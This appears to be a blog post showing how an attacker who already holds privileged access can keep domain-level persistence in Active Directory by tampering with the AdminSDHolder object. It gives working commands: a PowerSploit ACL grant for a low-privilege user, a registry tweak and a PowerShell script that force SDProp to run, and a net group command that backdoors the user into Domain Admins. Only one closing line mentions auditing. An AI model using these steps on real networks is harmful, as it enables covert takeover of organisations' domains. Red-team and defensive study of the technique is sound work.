If we have high privilege access to a domain, we will likely want to establish persistence with high privilege access. One mechanism to do this is to assign ourselves permissions to the adminSDHolder object in active directory:

Graphical user interface, application

Description automatically generated

Here we have the default adminSDHolder permissions. We are going to add our user “low” in here with modify or full control permissions:

Graphical user interface, application

Description automatically generated

Now this can be changed via other automated methods such as PowerShell using PowerSpolit:


Add-DomainObjectAcl -TargetIdentity “CN=AdminSDHolder,CN=System, DC=smallbiz,DC=local” -PrincipalIdentity low -Rights All

This object is used as a template to apply permissions to a range of groups:

Domain Admins



Account Operators

Enterprise Admins

Backup Operators

Domain Controllers


Print Operators

Read-only Domain Controllers


Schema Admins

Server Operators

Now in 60 minutes time the SDProp process will run applying these permissions to the protected groups, since we modified the adminSDHolder object (the permissions for this act as a template) every 60 minutes (default which can be changed) permissions will be re-applied to the protected groups, this time round it will give us the ability to modify those groups/objects. This will enable us to have full control of the domain.

We can trigger this using ldp.exe


or we can do this via this PowerShell module:


and finally, since we are privileged account to start with, we could change the registry key on a domain controller:


We can set this using powershell:

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters -Name AdminSDProtectFrequency -Value 60

The value is the number of seconds this process is triggered on a domain controller (the default is 60 minutes)

Graphical user interface, application

Description automatically generated

PowerShell Example

I’ve taken the PowersShell above and given it my own twist:

#Get the domain name from the current machines domain membership from wmi win32_computersystem domain object

$DomainName = Get-WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem | Select Domain


write-host “Forcing SD Propegation” -ForegroundColor Green

$DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext(‘domain’,$DomainName.Domain)


$DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)


write-host “FSMO – Primary Domain Controller Emulator (PDC Emulator) is $($DomainObject.PdcRoleOwner.Name).” -ForegroundColor Green

#get the PDCEmulator OS Version

$PDCEVersion = Get-WmiObject Win32_OperatingSystem -ComputerName $DomainObject.PdcRoleOwner.Name

#set the right task name (manual task at the minute)


if($PDCEVersion.Version -le 5){

write-host “Windows 2003 or 2000” -ForegroundColor Red

$TaskName = “FixUpInheritance” # Server 2000 and Server 2003



{write-host “Windows 2008 or Later” -ForegroundColor Red

$TaskName = “RunProtectAdminGroupsTask” #Server 2008 and Later


$RootDSE = New-Object System.DirectoryServices.DirectoryEntry(“LDAP://$($DomainObject.PdcRoleOwner.Name)/RootDSE”)


$RootDSE.UsePropertyCache = $false

#Execute the action

$RootDSE.Put($TaskName, “1”)



Once the SD Propagation Task has run the permissions on the protected objects will have been updated as so:

Graphical user interface, application, Word

Description automatically generated


Now we have the position where our account “low” who is not a member of the domain admins group can elevate:

Backdoor yourself into the domain admins group

net group “Domain Admins” low /domain /add

Now just a note there are other ways of changing groups e.g. using ADSI or PowerShell cmdlets.

To show this we’ve launched a process as “low” and added ourselves to the domain admins group:

Graphical user interface

Description automatically generated

We’ve shown the whoami /groups output to show that our session was NOT in domain amdins.

However, after running the net group command, we now look in ADUC:

Graphical user interface, text, application

Description automatically generated


As you can see the AdminSDHolder object can be tampered with to provide domain level persistence, clearly this objects permissions and changes should be audited and monitored for unauthorised changes.

Leave a Reply